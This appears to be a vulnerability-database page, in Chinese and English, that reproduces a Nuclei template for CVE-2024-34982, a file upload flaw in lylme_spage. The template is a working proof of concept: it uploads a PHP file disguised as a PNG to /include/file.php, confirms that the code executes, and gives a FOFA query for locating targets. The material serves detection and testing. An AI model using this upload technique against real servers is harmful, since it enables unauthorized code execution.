CVE-2024-34982: LyLme-Spage - Arbitary File Upload

日期: 2025-08-01 | 影响软件: LyLme-Spage | POC: 已公开

漏洞描述

An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.

PoC代码[已公开]

id: CVE-2024-34982

info:
  name: LyLme-Spage - Arbitary File Upload
  author: DhiyaneshDk
  severity: high
  description: |
    An arbitrary file upload vulnerability in the component /include/file.php of lylme_spage v1.9.5 allows attackers to execute arbitrary code via uploading a crafted file.
  reference:
    - https://github.com/n2ryx/CVE/blob/main/Lylme_pagev1.9.5.md
    - https://github.com/tanjiti/sec_profile
    - https://github.com/ATonysan/poc-exp/blob/main/60NavigationPage_CVE-2024-34982_ArbitraryFileUploads.py
  classification:
    epss-score: 0.7694
    epss-percentile: 0.98922
    cpe: cpe:2.3:a:lylme:lylme_spage:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: lylme
    product: lylme_spage
    fofa-query: icon_hash="-282504889"
  tags: cve,cve2024,lylme-spage,rce,intrusive

variables:
  string: "{{randstr}}"
  filename: "{{to_lower(rand_text_alpha(5))}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /include/file.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------575673989461736

        -----------------------------575673989461736
        Content-Disposition: form-data; name="file"; filename="{{filename}}.php"
        Content-Type: image/png

        <?php echo "{{string}}";unlink(__FILE__);?>
        -----------------------------575673989461736--

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '"code":'
          - '"msg":'
          - '"url":'
          - 'php"}'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: path
        part: body
        group: 1
        regex:
          - '"url":"([/a-z_0-9.]+)"'
        internal: true

  - raw:
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body, "{{string}}" )'
          - 'contains(header, "text/html")'
        condition: and
# digest: 4b0a00483046022100adacf7a78043c7d2898b96fff7cdc4b8ad090011cf19d6978c4b6c05cd9da61e022100e6f68b90a2d05c9c2a33928e1fb41acfbafecb4e9806bee20328f454828d041d:922c64590222798bb761d5b6d8e72950
来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2024/CVE-2024-34982.yaml